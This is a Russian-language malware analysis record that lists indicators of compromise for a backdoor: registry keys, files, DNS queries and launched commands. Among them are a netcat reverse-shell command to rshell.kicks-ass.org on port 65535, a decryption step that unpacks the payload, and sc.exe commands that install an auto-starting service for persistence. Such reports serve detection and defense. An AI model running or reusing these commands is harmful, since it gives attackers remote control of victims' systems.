Техническая информация (артефакты, зафиксированные при анализе: записи реестра, запускаемые команды, файлы, сетевые соединения)
- [<HKLM>\SYSTEM\ControlSet001\Services\latch] 'Start' = '00000002'
- %WINDIR%\latch\nc.exe rshell.kicks-ass.org 65535 -e cmd.exe
- %WINDIR%\latch\crypt.exe -decrypt -key secret -infile nc.cry -outfile nc.exe
- <SYSTEM32>\sc.exe start latch
- <SYSTEM32>\sc.exe create latch binPath= "cmd /c start \"\" \"%WINDIR%\latch\latch.bat\"" start= auto
- <SYSTEM32>\ping.exe -w 1000 -n 5 127.0.0.1
- <SYSTEM32>\cmd.exe /c start "" "%WINDIR%\latch\latch.bat"
- <SYSTEM32>\sc.exe delete latch
- <SYSTEM32>\taskkill.exe /f /fi "imagename eq cmd.exe" /fi "username eq SYSTEM"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\latch.bat" "
- <SYSTEM32>\sc.exe stop latch
- <SYSTEM32>\taskkill.exe /f /im "nc.exe"
- %WINDIR%\latch\nc.cry
- %WINDIR%\latch\crypt.exe
- %WINDIR%\latch\nc.exe
- %WINDIR%\latch\latch.bat
- %TEMP%\1.tmp\latch.bat
- %TEMP%\1.tmp\nc.cry
- %TEMP%\1.tmp\crypt.exe
- %TEMP%\1.tmp\latch.bat
- %TEMP%\1.tmp\crypt.exe
- %TEMP%\1.tmp\nc.cry
- 'rs####.kicks-ass.org':65535
- DNS ASK rs####.kicks-ass.org
- '<IP-адрес в локальной сети>':1037
- ClassName: '' WindowName: ''